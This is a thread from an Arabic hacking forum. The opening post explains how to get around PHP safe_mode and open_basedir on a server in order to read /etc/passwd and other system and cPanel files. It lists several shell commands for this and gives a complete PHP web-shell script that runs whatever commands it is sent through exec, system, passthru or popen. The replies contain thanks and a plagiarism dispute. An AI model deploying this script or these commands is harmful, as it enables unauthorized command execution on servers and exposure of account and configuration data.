حالة الموضوع:
مغلق
  1. W M V

    W M V Developer

    الأنتساب:
    ‏6 ابريل 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الإقامة:
    المدينة المنورة
    [​IMG]

    [​IMG]

    أخواني المطورين في شبكة عراق تيم سلام الله عليكم



    اليوم درسنا تخطي امر استخراج حسابات الشل - cat /etc/passwd


    عندما تكون السيف مود مفعلة يمنع كتابة الأوامر i:q2^:


    طبعآ أكواد بسيطة نستطيع تخطي حماية السيرفر إلي عاملنا مشاكل i:q1^:



    [​IMG]
    الكود الأول اذا ماضبط معاك أستخدم الكود الثاني :{13}:


    الكود الأول :


    كود PHP:
    xxd /etc/passwd
    rev 
    /etc/passwd
    tac 
    /etc/passwd
    more 
    /etc/passwd
    less 
    /etc/passwd



    [​IMG]


    الكود الثاني اذا ماضبط معاك نستخدم سكربت برايفت


    كود PHP:
    <?php
    echo file_get_contents('/etc/passwd'); 
    ?>

    [​IMG]


    السكربت :


    كود PHP:
    <?

    function 
    safeshell($komut)
    {
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    $res '';
    if (!empty(
    $komut))
    {
    if(
    function_exists('exec'))
    {
    @
    exec($komut,$res);
    $res join("\n",$res);
    }
    elseif(
    function_exists('shell_exec'))
    {
    $res = @shell_exec($komut);
    }
    elseif(
    function_exists('system'))
    {
    @
    ob_start();
    @
    system($komut);
    $res = @ob_get_contents();
    @
    ob_end_clean();
    }
    elseif(
    function_exists('passthru'))
    {
    @
    ob_start();
    @
    passthru($komut);
    $res = @ob_get_contents();
    @
    ob_end_clean();
    }
    elseif(@
    is_resource($f = @popen($komut,"r")))
    {
    $res "";
    while(!@
    feof($f)) { $res .= @fread($f,1024); }
    @
    pclose($f);
    }
    }
    return 
    $res;
    }
    echo 
    "<b><font color=blue>Private Safe Mode Command Execution Bypass Exploit </font></b><br>";
    echo 
    "<b><font color=red>            | iq-team.org | W M V</font></b><br>";
    print_r('
    <pre>
    <form method="POST" action="">
    <b><fontcolor=blue> c0mmand  :</font></b><input name="baba" type="text"><input  value="Extract" type="submit">
    </form>
    <form method="POST" action="">
    <b><font color=blue>sELECT Pleas :=) :</font><select size="1" name="liz0">
    <option value="cat /etc/passwd">/etc/passwd</option>
    <option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
    <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
    <option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
    <option value="cat /etc/hosts">/etc/hosts</option>
    <option value="cat /etc/named.conf">/etc/named.conf</option>
    <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
    </select> <input type="submit" value="Extract">
    </form>
    </pre>
    '
    );
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if(
    $_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
    if(
    $_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
    $uid=safeshell('id');
    $server=safeshell('uname -a');
    echo 
    "<pre><h4>";
    echo 
    "<b><font color=red>User:=)</font></b>:$uid<br>";
    echo 
    "<b><font color=red>Server</font></b>:$server<br>";
    echo 
    "<b><font color=red>C0mmands extracted:</font></b><br>";
    if(
    $_POST["baba"]!= "") { echo $liz0; }
    if(
    $_POST["liz0"]!= "") { echo $liz0zim; }
    echo 
    "</h4></pre>";
    ?>

    [​IMG]


    أتمنى أني وفقت في طرحي واتمنى انو ما يكون فيه تقصير ، وفقني الله وإياكم جميعاً &:": ​
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. MMA_LORD_735

    MMA_LORD_735 Developer

    الأنتساب:
    ‏5 سبتمبر 2011
    المشاركات:
    25
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    IQ-T34M
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    وعليكم السلام
    لاهنت وعساك ع القوة
    )5:"
     
  4. احمد العراقي

    احمد العراقي ExpErt DeveloPer

    الأنتساب:
    ‏17 سبتمبر 2011
    المشاركات:
    164
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    ~ IQ-T34M ~
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    الله ينور ياغالي
    موضوع مميز :{8}:​
     
  5. القناص

    القناص DeveloPer Plus

    الأنتساب:
    ‏8 ديسمبر 2012
    المشاركات:
    89
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    العراق
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    وعليكم السلام ورحمة الله وبركاته
    الله يعطيك العافية ياحبيبي

    واصل أبداعك !:"​
     
  6. ملـك بدون مملكه

    ملـك بدون مملكه DeveloPer Plus

    الأنتساب:
    ‏11 ديسمبر 2011
    المشاركات:
    101
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    لـــبـــنـــان صـــيــدا
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    جزاك الله الف خير اخوي :{2}:
     
  7. Mr.HaWQaL

    Mr.HaWQaL Developer

    الأنتساب:
    ‏31 مارس 2013
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    السلام عليكم
    ربي يهديك أخي صاحب الموضوع
    هذا الموضوع أنا صاحبه و أنا الذي كتبته و تعبت من أجله تعدل فيه و تقول أنو لك
    الموضوع هذا وضعته في منتديين فقط ديزاد رووت و الحماية للأبد
    + السكربت أنا إلي معدل فيه و كاتب فيه حقوقي تغيرها لحقوقك شو ها التزييف
    لو أنك وضعت الموضوع كامل بدون تحريف لكنت قبلت ذلك لكن أنك تغير الحقوق تنسبها لك مو سهلة حبيبي الغالي
    هذا فقط ما يتميز به العرب التحريف فقط
    حسبنا الله و نعم الوكيل
     
  8. The-Worm

    The-Worm Active DeveloPer

    الأنتساب:
    ‏10 سبتمبر 2011
    المشاركات:
    84
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    IQ-T34M
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    السلآم عليكم ورحمة الله وبركاته
    يعطيك ألف عافية أخي موضوع مميز
    موفق اخي &:"​
     
  9. Yousef

    Yousef <link href="http://www.iq-team.org/vb/ghost/ghost. DeveloPer Plus

    الأنتساب:
    ‏1 نوفمبر 2012
    المشاركات:
    118
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: تخطي امر استخراج حسابات الشل - cat /etc/passwd

    عليكم السلام اخي اذا كان في انتهاك للحقوق يمكن استخدام خاصية التبليغ [​IMG]


    الاداره ماتقصر معاك &:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة